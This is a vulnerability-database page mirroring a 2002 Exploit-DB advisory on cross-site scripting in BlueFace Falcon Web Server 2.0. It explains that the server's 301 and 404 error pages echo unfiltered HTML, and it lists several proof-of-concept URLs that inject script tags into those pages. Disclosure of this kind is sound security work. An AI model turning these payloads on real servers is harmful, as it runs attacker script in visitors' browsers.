Lucene search
+L

BlueFace Falcon Web Server 2.0 - Error Message Cross-Site Scripting

🗓️ 09 Aug 2002 00:00:00Reported by Matt MurphyType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 27 Views

Falcon Web Server 2.0 allows Cross-Site Scripting via unfiltered HTML in error messages.

Related
Code
ReporterTitlePublishedViews
Family
cve
CVE
CVE-2002-2318
26 Oct 200719:00
cve
cvelist
Cvelist
CVE-2002-2318
26 Oct 200719:00
cvelist
euvd
EUVD
EUVD-2002-2296
7 Oct 202500:30
euvd
nvd
NVD
CVE-2002-2318
31 Dec 200205:00
nvd
redhatcve
RedhatCVE
CVE-2002-2318
21 May 202520:38
redhatcve
source: https://www.securityfocus.com/bid/5435/info

Falcon Webserver does not sufficiently sanitize HTML tags from error message output. In particular, attackers may inject HTML into 301 and 404 error pages.

It is possible to create a malicious link to the server which will generate an error page with attacker-supplied HTML and script code when visited. Arbitrary HTML and script code will be executed by the web client of the user visiting the server, in the security context of the server.


* 301 Message XSS

Closing TITLE tag:
http://localhost/%3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A HREF:
http://localhost/%22%3cscript%3ealert(%22xss%22)%3c/script%3e
Closing A tag:
http://localhost/%3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e

* 404 Message XSS

http://localhost/%3cscript%3ealert(%22xss%22)%3c/script%3e/

The 301 examples will simply add a slash and pass it on to the browser,
which then raises a 404, exploiting that vulnerability as well (although the
301 exploits will cause some useless HTML to be added on)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

03 Oct 2012 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 24.3
EPSS0.01452
27